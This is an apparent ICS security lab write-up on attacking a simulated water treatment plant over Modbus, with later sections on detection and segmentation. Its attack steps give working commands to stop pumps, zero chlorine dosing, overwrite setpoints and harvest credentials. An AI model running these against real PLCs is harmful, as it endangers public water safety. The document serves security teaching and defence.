How I Hacked a City’s Water Supply: A Deep Dive Into Modbus, SCADA, and OT Insecurity + Video

Introduction:

Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) environments form the backbone of critical infrastructure, from water treatment to power generation. However, the legacy protocols they rely on, such as Modbus, were designed decades ago without security in mind, often operating without authentication or encryption. This article dissects a recent penetration testing exercise on a simulated municipal water treatment plant, revealing how easily unauthenticated Modbus communications can be exploited to manipulate physical processes and cause catastrophic failures.

Learning Objectives:

  • Understand the architecture of a SCADA/PLC environment controlling critical infrastructure.
  • Learn how to perform reconnaissance and fingerprinting on ICS networks using open-source tools.
  • Execute attacks on Modbus protocols to manipulate physical processes, including stopping pumps and altering chemical dosing.

You Should Know:

1. Setting Up the Lab: Cloning the Municipal Water Treatment Plant Simulator

The foundation of this exercise is a virtual industrial environment created by Gnana Aravind K, which includes a virtual Modbus PLC, a SCADA HMI, and a custom pentesting toolkit.

Step‑by‑step guide:

  1. Clone the Repository: First, download the simulation environment from the provided GitHub link.
    git clone https://github.com/ganarana-v/ICSSecurityLab.git
    cd ICSSecurityLab/WaterTreatmentPlant
    
  2. Review the Architecture: Read the `README.md` to understand the network topology. Typically, the PLC and HMI will be on a virtual network (e.g., 192.168.1.0/24).
  3. Start the Environment: Use Docker or a provided script to spin up the containers.
    docker-compose up -d
    
  4. Verify Connectivity: Ensure your attacking machine (likely Kali Linux) can reach the targets.
    ping 192.168.1.10
    

2. Reconnaissance: Scanning for Modbus Slave IDs

Before interacting with the PLCs, we need to identify which Modbus Unit IDs (slaves) are alive on the network. We can use `nmap` with its Modbus script.

Step‑by‑step guide:

  1. Discover Live Hosts: First, find the PLC IP address.
    sudo nmap -sn 192.168.1.0/24

    Expected output: `Nmap scan report for 192.168.1.10`.

  2. Scan for Modbus Service: Verify the Modbus port (502) is open.
    nmap -p 502 192.168.1.10

  3. Enumerate Unit IDs: Use the `modbus-discover` script to brute-force Unit IDs.
    nmap -p 502 --script modbus-discover 192.168.1.10

    This script sends requests to Unit IDs 1-255. A response confirms the PLC is alive and reveals which Unit IDs are in use (e.g., Unit ID 1 for the main pump controller).

3. Fingerprinting the Device and Dumping the Memory Map

To understand the industrial process, we need to extract all readable coils (binary outputs) and registers (16-bit data).

Step‑by‑step guide using `modbus-cli` (Python tool):

  1. Install Modbus CLI:
    pip install modbus-cli

  2. Read All Coils (Discrete Outputs): Dump the state of all coils from address 0 to 999.
    modbus read --unit 1 --function 1 --starting-address 0 --quantity 1000 192.168.1.10

  3. Read All Holding Registers: Dump the process values (setpoints, tank levels).
    modbus read --unit 1 --function 3 --starting-address 0 --quantity 100 192.168.1.10

  4. Interpret the Data: A value of `1` for a coil might mean “Pump Running,” while a register value of `750` might mean “Tank Level: 75.0%”. Correlate these with the HMI display to map the memory.
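The reads in steps 2 and 3 come back as raw Modbus/TCP frames, and the interpretation in step 4 (a coil bit meaning "running", a raw 750 meaning 75.0%, register values spelling ASCII) is easier to follow on actual bytes. The following Python script is an added example written for this article; it is not code from the ICSSecurityLab simulator or from `modbus-cli`. It decodes constructed Read Coils (FC 1) and Read Holding Registers (FC 3) responses, validates the MBAP header, surfaces exception responses, and applies an assumed register map (the address-to-meaning table and its scale factors are illustrative, not the lab's). It also shows a wire detail the step-by-step text does not mention: coils arrive packed eight per byte, least-significant bit first, with the last byte zero-padded.

```python
import struct

# Constructed sample frames (not captured from the simulator): Modbus/TCP responses
# to the two read requests the article issues. MBAP header = transaction id,
# protocol id (always 0), length of everything after it, unit id; then the PDU.
FC3_RESPONSE = bytes.fromhex(
    "0001 0000 000b 01"          # MBAP: tid=1, proto=0, length=11, unit=1
    "03 08"                      # FC 3 (Read Holding Registers), 8 data bytes
    "02ee 0000 0041 0042"        # registers 0..3 = 750, 0, 0x0041, 0x0042
)
FC1_RESPONSE = bytes.fromhex(
    "0002 0000 0005 01"          # MBAP: tid=2, proto=0, length=5, unit=1
    "01 02"                      # FC 1 (Read Coils), 2 data bytes
    "21 02"                      # 0b00100001, 0b00000010 -> coils 0, 5 and 9 are ON
)

# Standard Modbus exception codes a PLC returns instead of data.
EXCEPTIONS = {1: "ILLEGAL FUNCTION", 2: "ILLEGAL DATA ADDRESS",
              3: "ILLEGAL DATA VALUE", 4: "SLAVE DEVICE FAILURE"}

# Assumed register map for the lab PLC (an illustration, not taken from the
# simulator's README): address -> (name, scale factor applied to the raw value).
REGISTER_MAP = {0: ("tank_level_pct", 0.1), 1: ("chlorine_setpoint_ppm", 0.01)}


def split_frame(frame):
    """Validate the MBAP header and return (unit_id, pdu)."""
    _tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("protocol id %d is not Modbus/TCP" % proto)
    if length != len(frame) - 6:
        raise ValueError("MBAP length %d does not match frame size" % length)
    return unit, frame[7:]


def check_exception(pdu, expected_fc):
    """Raise if the PDU is an exception response (function code with bit 7 set)."""
    fc = pdu[0]
    if fc & 0x80:
        raise ValueError("exception %s for FC %d" % (EXCEPTIONS.get(pdu[1], pdu[1]), fc & 0x7F))
    if fc != expected_fc:
        raise ValueError("expected FC %d, got %d" % (expected_fc, fc))


def decode_read_registers(frame):
    """FC 3 response -> list of 16-bit register values (big-endian on the wire)."""
    _, pdu = split_frame(frame)
    check_exception(pdu, 3)
    byte_count = pdu[1]
    return list(struct.unpack(">%dH" % (byte_count // 2), pdu[2:2 + byte_count]))


def decode_read_coils(frame, quantity):
    """FC 1 response -> list of booleans. Coils are packed 8 per byte, LSB first,
    and the last byte is zero-padded, so the caller passes the requested quantity."""
    _, pdu = split_frame(frame)
    check_exception(pdu, 1)
    byte_count = pdu[1]
    bits = []
    for byte in pdu[2:2 + byte_count]:
        bits.extend(bool((byte >> i) & 1) for i in range(8))
    return bits[:quantity]


def interpret_registers(values, start=0):
    """Apply the assumed register map: raw 750 at address 0 -> 75.0 %."""
    out = {}
    for offset, raw in enumerate(values):
        entry = REGISTER_MAP.get(start + offset)
        if entry:
            name, scale = entry
            out[name] = round(raw * scale, 2)
    return out


def registers_to_ascii(values, packed=False):
    """Render registers as text. Default: one character per register (the article's
    0x0041 0x0042 -> 'AB'). packed=True: two bytes per register, high byte first,
    as device-identification strings are usually stored. Non-printables become '.'."""
    raw = bytearray()
    for v in values:
        raw.extend(struct.pack(">H", v) if packed else bytes([v & 0xFF]))
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)


if __name__ == "__main__":
    regs = decode_read_registers(FC3_RESPONSE)
    print("registers:", regs, "->", interpret_registers(regs))
    print("coils 0-9:", decode_read_coils(FC1_RESPONSE, quantity=10))
    print("registers 2-3 as text:", registers_to_ascii(regs[2:]))
```

Decoding responses off the wire is also what a passive monitor does: the same frame parser fed from a mirror port gives a defender an independent record of what the PLC actually reported, instead of trusting the HMI view alone.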

4. Extracting Maintenance Credentials

Often, credentials for the engineering workstation or HMI are hardcoded or stored in plaintext within the PLC’s memory or the HMI’s configuration files.

Step‑by‑step guide:

  1. Intercept HMI Traffic: If the HMI uses a web interface, run Wireshark to capture traffic while an engineer logs in.
    wireshark

    Filter by `http` or `tcp.port == 80`.

  2. Analyze PLC Registers: Sometimes the credentials are stored in specific holding registers. Scan memory ranges looking for ASCII strings. Write a small Python script to convert register values to characters. For example, register values `0x0041 0x0042` translate to “AB”.

5. Exploiting Process Control: Forcing Pump Stop and Chlorine Dose Manipulation

This is the core of the attack: issuing unauthorized writes to the PLC to disrupt physical operations.

Step‑by‑step guide using `modbus-cli`:

  1. Force Stop the Main Pump: Identify the coil controlling the pump (e.g., Coil address 5). Writing `0` stops it.
    modbus write --unit 1 --function 5 --starting-address 5 --value 0 192.168.1.10
    

    What this does: This sends a “Force Single Coil” command (Function Code 5) to turn the coil OFF, stopping the pump regardless of the HMI’s automatic logic.

  2. Disable Chlorine Dosing: Find the register controlling the chlorine dosing setpoint (e.g., Register 100). Write `0` to stop the flow.
    modbus write --unit 1 --function 6 --starting-address 100 --value 0 192.168.1.10
    
  3. Bulk Setpoint Override: To trigger an emergency shutdown, we can write multiple registers at once using Function Code 16.
    modbus write --unit 1 --function 16 --starting-address 50 --output-value 0,0,0,0,0 192.168.1.10
    

    What this does: This writes zeros to five consecutive registers (addresses 50-54), potentially overriding all safety limits and process targets simultaneously.

6. HMI REST API Attacks

Modern HMIs often expose REST APIs for web dashboards. These can be vulnerable to IDOR or broken authentication.

Step‑by‑step guide using `curl`:

  1. Discover API Endpoints: Inspect the HMI web page source (F12) or use a tool like `ffuf` to fuzz for API paths.
  2. Check for Unauthenticated Access: Attempt to fetch data without a session token.
    curl http://192.168.1.100:8080/api/process/data
    
  3. Manipulate Data via API: If an endpoint like `/api/setpoint` exists, attempt to POST malicious values.
    curl -X POST http://192.168.1.100:8080/api/setpoint/pump1 -H "Content-Type: application/json" -d '{"value": 0}'
    

    This could achieve the same effect as the Modbus write, but via the HMI’s own interface, potentially bypassing network segregation between the IT and OT networks.

7. Triggering Emergency Shutdown and Mitigation

By chaining these attacks (stopping pumps and disabling dosing), the system detects unsafe conditions and initiates an Emergency Shutdown (ESD).

Understanding the Impact:

  • Why it works: The Modbus protocol trusts the client. It does not validate whether the source of a command is authorized.
  • Mitigation Commands (Linux/Windows):
    • Network Segmentation: Use `iptables` on Linux to restrict access to port 502 to the authorized HMI or engineering host (replace `<AUTHORIZED_HMI_IP>` with that host's address). Rule order matters: the ACCEPT for the authorized host must be added before the catch-all DROP.
      sudo iptables -A INPUT -p tcp --dport 502 -s <AUTHORIZED_HMI_IP> -j ACCEPT
      sudo iptables -A INPUT -p tcp --dport 502 -j DROP

    • Monitor Anomalies: Use `tshark` to detect writes to critical registers. This filter matches a Function Code 6 write to register 100; a Function Code 16 write to a range (the bulk override above) is not matched by it and needs its own condition.
      tshark -i eth0 -Y "modbus.func_code == 6 && modbus.reference_num == 100"
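The `tshark` filter above matches one specific write: Function Code 6 to register 100. A defender wants the same check to cover the other state-changing function codes, writes that sweep a range (the bulk override in section 5 hits registers 50-54 with Function Code 16, and a Function Code 16 write starting at 95 lands on register 100 without ever naming it), and the source-address allowlist that the `iptables` rules express. The following Python script is an added example, not code from the article, the simulator, or any product. It parses constructed Modbus/TCP requests and emits an alert when a write comes from a non-allowlisted host or touches a protected coil or register; the sample frames, the HMI address 192.168.1.100, the rogue host 192.168.1.50, and the protected-address sets are all assumptions for illustration.

```python
import struct
from ipaddress import ip_address, ip_network

# Modbus function codes that change PLC state: the two single writes the article
# uses, plus their multi-item forms.
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers"}

# Assumed site policy (an illustration, not from the simulator): only the HMI host
# may write, and these addresses are process-critical (the article's pump coil 5,
# chlorine setpoint register 100 and safety-limit registers 50-54).
AUTHORIZED_WRITERS = [ip_network("192.168.1.100/32")]
PROTECTED_COILS = {5}
PROTECTED_REGISTERS = set(range(50, 55)) | {100}

# Constructed sample requests (not captured from the lab), as (source IP, frame).
SAMPLES = [
    # HMI polling 100 holding registers: FC 3, start 0, quantity 100 (benign)
    ("192.168.1.100", bytes.fromhex("0001 0000 0006 01 03 0000 0064")),
    # rogue host writes 0 to register 100: FC 6 (the article's chlorine-dosing step)
    ("192.168.1.50", bytes.fromhex("0002 0000 0006 01 06 0064 0000")),
    # rogue host writes 10 zeros starting at register 95: FC 16, reaches 100 without naming it
    ("192.168.1.50", bytes.fromhex("0003 0000 001b 01 10 005f 000a 14" + "00" * 20)),
    # the HMI itself forces coil 5 off: authorized source, but a protected coil
    ("192.168.1.100", bytes.fromhex("0004 0000 0006 01 05 0005 0000")),
]


def parse_write_request(frame):
    """Return (unit, fc, start, count) if the frame is a Modbus/TCP write request,
    None for any other function code. Raises on a malformed MBAP header."""
    _tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or length != len(frame) - 6:
        raise ValueError("malformed MBAP header")
    pdu = frame[7:]
    fc = pdu[0]
    if fc not in WRITE_FUNCTIONS:
        return None
    start = struct.unpack(">H", pdu[1:3])[0]
    # single writes carry the value at bytes 3-4; multi writes carry a quantity there
    count = 1 if fc in (5, 6) else struct.unpack(">H", pdu[3:5])[0]
    return unit, fc, start, count


def evaluate(src_ip, frame):
    """Alert strings for one request: unauthorized writer and/or protected address hit."""
    parsed = parse_write_request(frame)
    if parsed is None:
        return []
    unit, fc, start, count = parsed
    name = WRITE_FUNCTIONS[fc]
    alerts = []
    src = ip_address(src_ip)
    if not any(src in net for net in AUTHORIZED_WRITERS):
        alerts.append("%s from unauthorized host %s to unit %d" % (name, src_ip, unit))
    # range-aware check: a multi-register write starting below 100 can still land on it
    protected = PROTECTED_COILS if fc in (5, 15) else PROTECTED_REGISTERS
    hit = sorted(set(range(start, start + count)) & protected)
    if hit:
        alerts.append("%s from %s touches protected address(es) %s" % (name, src_ip, hit))
    return alerts


def run(samples=SAMPLES):
    """Evaluate every sample and return the alerts keyed by sample index."""
    return {i: evaluate(src, frame) for i, (src, frame) in enumerate(samples)}


if __name__ == "__main__":
    for i, alerts in run().items():
        print(i, alerts or "ok")
```

In a deployment the frames would come from a SPAN port or a pcap rather than the inline list; the evaluation logic is unchanged. Keeping the protected-address sets and the writer allowlist as data makes the detector auditable against the site's register map, which is exactly the artifact section 3 builds.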
    

What Undercode Says:

  • Key Takeaway 1: Legacy protocols are the Achilles’ heel of critical infrastructure. The absence of authentication in Modbus allows anyone with network access to become a rogue operator.
  • Key Takeaway 2: Simulators are invaluable for understanding the physical consequences of cyber attacks. Seeing a digital pump stop or a chlorine level drop to zero solidifies the risk far more than a theoretical report.

This exercise highlights a critical gap in industrial security: while IT teams focus on data breaches, OT teams must prepare for kinetic warfare. The attack required no zero-day exploits, just a basic understanding of industrial protocols and freely available tools. Defending against this requires a shift from “air-gap” myths to robust network monitoring, deep packet inspection, and strict adherence to the ISA/IEC 62443 standards for zone-based segmentation.

Prediction:

As nation-state actors and hacktivists become more sophisticated, we will see a rise in “hybrid attacks” that target the intersection of IT and OT. Specifically, AI-driven anomaly detection will become mandatory in water and power utilities, but conversely, attackers will use AI to generate “noise” that mimics normal process variations to hide their manipulation of setpoints over long periods, leading to gradual, catastrophic failures rather than immediate shutdowns.

Reported By: Khanjen P – Hackers Feeds